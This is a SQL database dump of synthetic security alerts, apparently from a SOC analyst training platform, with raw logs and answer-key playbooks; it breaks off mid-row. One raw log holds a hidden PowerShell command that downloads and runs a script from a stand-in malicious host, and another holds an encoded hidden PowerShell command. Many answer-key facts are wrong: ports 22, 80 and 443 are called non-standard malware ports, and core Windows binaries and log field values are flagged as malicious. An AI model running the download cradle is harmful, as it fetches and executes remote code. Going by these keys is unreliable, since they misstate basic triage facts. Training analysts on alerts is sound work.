SET FOREIGN_KEY_CHECKS = 0;

-- phpMyAdmin SQL Dump
-- version 5.2.1
-- https://www.phpmyadmin.net/
--
-- Host: localhost:3306
-- Generation Time: Jan 11, 2026 at 06:17 PM
-- Server version: 10.6.23-MariaDB-cll-lve
-- PHP Version: 8.3.14

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `infosecl_platform`
--

-- --------------------------------------------------------

--
-- Table structure for table `alerts`
--

DROP TABLE IF EXISTS `alerts`;
CREATE TABLE `alerts` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `severity` enum('low','medium','high','critical') NOT NULL,
  `source` varchar(255) DEFAULT NULL,
  `details` text DEFAULT NULL,
  `alert_type` varchar(100) DEFAULT NULL,
  `mitre_technique` varchar(100) DEFAULT NULL,
  `real_world_example` tinyint(1) DEFAULT 0,
  `status` varchar(50) DEFAULT 'new',
  `assigned_to` int(11) DEFAULT NULL,
  `raw_log` text DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `playbook_solution` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `difficulty` varchar(50) DEFAULT 'Beginner',
  `path_code` varchar(20) DEFAULT NULL,
  `min_level` int(11) DEFAULT 1,
  `is_ai_generated` tinyint(1) DEFAULT 0,
  `sector_code` varchar(50) DEFAULT NULL
) ;

--
-- Dumping data for table `alerts`
--

INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(166, 'Unauthorized Access Attempt Detected on Company Database', 'high', 'AWS CloudTrail', 'A suspicious login attempt was detected on the company\'s AWS RDS instance, likely indicating a brute force attack. Attackers often attempt multiple logins in a short period of time to guess passwords. Example citation: The 2017 MongoDB ransom attacks where attackers accessed databases using weak passwords.', 'Brute Force', 'T1110', 1, 'investigating', 44, '{\"eventVersion\":\"1.07\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AWS:123456789012:user/JohnDoe\",\"arn\":\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\",\"accountId\":\"123456789012\",\"userName\":\"UnauthorizedAccessUser\"},\"eventTime\":\"2023-11-06T19:37:18Z\",\"eventSource\":\"rds.amazonaws.com\",\"eventName\":\"LoginAttempt\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"203.0.113.42\",\"userAgent\":\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\",\"requestParameters\":{\"dBInstanceIdentifier\":\"companydb\",\"masterUserName\":\"admin\"},\"responseElements\":null,\"additionalEventData\":{\"LoginStatus\":\"Failed\",\"FailureReason\":\"IncorrectPassword\"},\"requestID\":\"cd06a8b5-73e4-11e6-8b77-6b1937429304\",\"eventID\":\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\",\"readOnly\":false,\"resources\":[{\"ARN\":\"arn:aws:rds:us-west-2:123456789012:db:companydb\",\"accountId\":\"123456789012\",\"type\":\"AWS::RDS::DBInstance\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}', '2025-12-27 15:57:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.42 reported 211 times for malicious activity. Abuse confidence score: 99%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"123456789012\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"UnauthorizedAccessUser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"Failed\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_6\",\"type\":\"geolocation\",\"value\":\"us-west-2\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from us-west-2 - unusual location for this user\'s typical access pattern.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'NULL', 1, 0, NULL),
(216, 'Suspicious PowerShell Execution Detected', 'high', 'process', 'A potentially malicious PowerShell script execution was detected. The script attempted to bypass execution policies and downloaded dangerous payloads.', 'exec_anomaly', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2023-10-29T14:32:45Z\",\"host\":\"workstation123.company.local\",\"user\":{\"username\":\"jdoe\",\"domain\":\"company\"},\"process\":{\"name\":\"powershell.exe\",\"pid\":3489,\"cmdline\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.example.com/payload.ps1\')\",\"file_hash\":{\"sha256\":\"d41d8cd98f00b204e9800998ecf8427e\"}},\"network\":{\"src_ip\":\"192.168.1.105\",\"dest_ip\":\"198.51.100.22\"},\"alert_triggered\":true,\"tags\":[\"scripting\",\"execution_policy_bypass\"]}', '2025-12-23 05:51:29', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.105 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 198.51.100.22 reported 599 times for malicious activity. Abuse confidence score: 94%.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"workstation123.company.local\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"50/94 security vendors flagged this domain as malicious.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"60/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS'),
(217, 'Suspicious Remote Login Attempt Detected', 'high', 'Windows Security Log', 'A remote login attempt was detected from a suspicious IP address. This matches known brute force attack patterns. Refer to CVE-2019-0708 for similar incidents of brute forcing over remote desktop services.', 'Brute Force', 'T1110', 1, 'investigating', NULL, '{\"ProviderName\":\"Microsoft-Windows-Security-Auditing\",\"EventID\":4625,\"Level\":\"Warning\",\"Category\":\"Logon\",\"TimeCreated\":\"2023-10-05T21:34:22Z\",\"EventRecordID\":87654321,\"RemoteIP\":\"203.0.113.45\",\"User\":\"NotAvailable\",\"WorkstationName\":\"RDP-SERVER\",\"FailureReason\":\"Unknown user name or bad password\",\"LogonType\":3,\"LogonProcessName\":\"Advapi\",\"AuthenticationPackageName\":\"Negotiate\",\"ServiceName\":\"RDP/RDGateway\",\"ProcessID\":680,\"SubStatus\":\"0xC000006A\",\"NetworkAccountName\":\"Guest\",\"NetworkAccountDomain\":\"LOCAL\",\"WorkstationUniqueId\":\"uuid-123e4567-e89b-12d3-a456-426614174000\"}', '2026-01-06 12:54:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 165 times for malicious activity. Abuse confidence score: 76%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"NotAvailable\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"Guest\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"LOCAL\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'),
(218, 'Unauthorized Access to Admin Panel', 'high', 'web_application', 'A user attempted to access the admin panel without appropriate credentials.', 'unauthorized_access', 'T1078.001', 1, 'New', NULL, '{\"timestamp\":\"2023-10-12T15:34:59Z\",\"event_id\":\"WEB-302\",\"user_id\":\"guest_user\",\"ip_address\":\"192.168.1.100\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\",\"request_method\":\"POST\",\"requested_url\":\"/admin\",\"response_code\":403,\"message\":\"Access denied. User lacks permission for admin panel access.\"}', '2025-12-24 08:36:25', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.100 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"guest_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'NULL', 1, 0, NULL),
(219, 'Suspicious File Download Detected', 'medium', 'network', 'A large file containing executable code was downloaded from an untrusted source.', 'malware_distribution', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2023-10-12T12:24:11Z\",\"event_id\":\"NET-917\",\"src_ip\":\"172.16.0.5\",\"dest_ip\":\"138.68.45.114\",\"protocol\":\"HTTP\",\"url\":\"http://suspicious-domain.com/malicious.exe\",\"file_size_bytes\":10485760,\"http_method\":\"GET\",\"status_code\":200,\"content_type\":\"application/x-msdownload\",\"message\":\"File downloaded from a blacklisted domain.\"}', '2025-12-23 18:34:09', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"172.16.0.5 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"138.68.45.114\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 138.68.45.114 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"suspicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"0/94 security vendors flagged this domain. Registered for 5+ years.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://suspicious-domain.com/malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan.io\",\"verdict\":\"clean\",\"details\":\"URL belongs to legitimate service with valid SSL certificate.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"\"}', 'Beginner', 'EDR', 1, 0, 'TECH'),
(220, 'Unusual Process Execution Detected', 'critical', 'process', 'A rarely used system utility was executed with suspicious command-line parameters.', 'execution', 'T1569.002', 0, 'New', NULL, '{\"timestamp\":\"2023-10-12T08:45:22Z\",\"event_id\":\"PROC-401\",\"process_name\":\"wmic.exe\",\"cmdline\":\"wmic process get brief /format:list\",\"user_name\":\"local_user\",\"file_hash\":\"3d9f8714f786045de44f7286d534234a\",\"parent_process\":\"cmd.exe\",\"execution_path\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\\",\"message\":\"WMI script executed, potentially collecting sensitive information.\"}', '2025-12-24 03:44:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"local_user\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3d9f8714f786045de44f7286d534234a\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"59/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wmic.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates suspicious script execution\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS'),
(221, 'Phishing Email Detected', 'low', 'email', 'An email resembling a known trusted source was marked as phishing.', 'phishing', 'T1566', 1, 'investigating', 31, '{\"timestamp\":\"2023-10-12T11:13:47Z\",\"event_id\":\"EMAIL-203\",\"sender\":\"alerts@trustedsource.com\",\"recipient\":\"user@example.com\",\"subject\":\"Urgent: Account Verification Required!\",\"headers\":{\"from\":\"alerts@trustedsource.com\",\"to\":\"user@example.com\",\"subject\":\"Urgent: Account Verification Required!\",\"received\":\"from unknown (HELO trustedsource.com) (203.0.113.5)\"},\"attachment_name\":\"verify_account.html\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"message\":\"Email suspected of being a phishing attempt due to suspicious sending server.\"}', '2025-12-24 05:11:55', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@trustedsource.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 3 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"user@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 5 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"60/72 security vendors identified this file as malware.\"}}],\"expected_actions\":[\"block_sender\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Alert type indicates phishing\"}', 'Beginner', 'NULL', 1, 0, NULL),
(222, 'Suspicious RDP Login Attempt from Unrecognized IP', 'high', 'Windows Security Log', 'An unexplained RDP login attempt was detected from an IP not previously associated with our infrastructure. This can indicate an account compromise attempt, which is a common precursor to a ransomware attack. Reference: Microsoft Security Response Center report on RDP exploitation (CVE-2019-0708).', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"EventID\":4625,\"LogName\":\"Security\",\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"TimeGenerated\":\"2023-10-23T02:15:43.235Z\",\"EventDescription\":\"An account failed to log on.\",\"AccountName\":\"Unknown_user\",\"WorkstationName\":\"WIN-CORP-PC01\",\"IpAddress\":\"198.51.100.42\",\"IpPort\":\"3389\",\"LogonType\":\"10\",\"FailureReason\":\"Unknown user name or bad password.\",\"SubStatus\":\"0xC000006A\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"TargetDomainName\":\"CORP\",\"TargetUserName\":\"unknown_user\",\"TargetDomainSid\":\"S-1-5-21-1234567890-2345678901-3456789012-1001\"}', '2025-12-24 05:00:06', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 198.51.100.42 reported 446 times for malicious activity. Abuse confidence score: 95%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"Unknown_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"unknown_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'),
(223, 'Unauthorized Remote Access Attempt Detected', 'high', 'network', 'Multiple failed login attempts were detected from a foreign IP address attempting to access the SSH service.', 'Brute Force Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2023-10-28T14:15:22Z\",\"src_ip\":\"203.0.113.42\",\"dest_ip\":\"192.168.1.20\",\"dest_port\":22,\"protocol\":\"TCP\",\"event_type\":\"connection_attempt\",\"login_attempts\":20,\"success_attempts\":0,\"usernames_tried\":[\"admin\",\"root\",\"test\"],\"geo_location\":\"Country: Unknown, Region: Unknown\",\"firewall_status\":\"BLOCKED\",\"alert_generated_by\":\"intrusion_detection_system\"}', '2025-12-24 05:59:21', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.42 reported 359 times for malicious activity. Abuse confidence score: 91%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.20 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"geolocation\",\"value\":\"Country: Unknown, Region: Unknown\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from Country: Unknown, Region: Unknown - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 20 failed login attempts detected\"}', 'Intermediate', 'NDR', 1, 0, 'OT_ICS'),
(224, 'Suspicious PowerShell Script Execution Detected', 'high', 'endpoint', 'A PowerShell script was executed which is known for its use in information gathering and potential lateral movement.', 'process', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2023-11-04T13:45:23Z\",\"hostname\":\"WIN-3HT955Q9JL1\",\"username\":\"jdoe\",\"process_id\":1476,\"process_name\":\"powershell.exe\",\"parent_process_id\":1364,\"parent_process_name\":\"explorer.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"cmdline\":\"powershell.exe -nop -w hidden -enc UABvAHcAZQByAFMAagBiAGwAZQBjAHQAIABTAHgAbwBvAGwAQgBpAG4AYgBvAGsALwBnAG8A\",\"network_activity\":{\"outbound_ip_connections\":[{\"dest_ip\":\"192.168.1.102\",\"dest_port\":80,\"protocol\":\"TCP\"},{\"dest_ip\":\"45.76.23.49\",\"dest_port\":443,\"protocol\":\"TCP\"}]},\"suspicious_indicators\":[\"EncodedCommand\",\"Network connection to uncommon destination\"]}', '2025-12-24 05:09:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.102 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.23.49\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 45.76.23.49 reported 129 times for malicious activity. Abuse confidence score: 97%.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"51/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_7\",\"type\":\"port\",\"value\":\"80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 80 commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_8\",\"type\":\"port\",\"value\":\"443\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 443 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'),
(225, 'Unauthorized Remote Access Attempt', 'high', 'network', 'Detected repeated login attempts from a suspicious IP address, potentially indicating a brute force attack.', 'Unauthorized Access', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2023-10-25T10:32:17Z\",\"event_type\":\"network\",\"src_ip\":\"203.0.113.45\",\"src_port\":44832,\"dest_ip\":\"192.168.1.10\",\"dest_port\":22,\"protocol\":\"TCP\",\"user_agent\":\"SSH-2.0-OpenSSH_7.6\",\"message\":\"Failed password for invalid user admin from 203.0.113.45 port 44832 ssh2\",\"attempt_count\":15,\"data_transferred_bytes\":524}', '2025-12-25 05:54:43', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 216 times for malicious activity. Abuse confidence score: 81%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.10 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"port\",\"value\":\"44832\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 44832 commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 15 failed login attempts detected\"}', 'Intermediate', 'NDR', 1, 0, 'FINANCE'),
(226, 'Unauthorized Access Attempt Detected', 'high', 'network', 'Multiple failed login attempts were detected from a foreign IP address, potentially indicating a brute force attack targeting the SSH service.', 'Unauthorized Access', 'T1110 - Brute Force', 1, 'New', NULL, '{\"timestamp\":\"2023-10-29T02:41:27Z\",\"event_type\":\"authentication_failed\",\"service\":\"SSH\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.10\",\"username_attempts\":[\"admin\",\"root\",\"testuser\"],\"failed_attempts_count\":15,\"alert_threshold_exceeded\":true,\"geo_location\":\"New Zealand\",\"session_id\":\"9H4F5J2K3M\",\"network_info\":{\"src_port\":58764,\"dest_port\":22,\"protocol\":\"TCP\"}}', '2025-12-25 05:07:28', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 322 times for malicious activity. Abuse confidence score: 87%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.10 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"geolocation\",\"value\":\"New Zealand\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from New Zealand - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"58764\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 58764 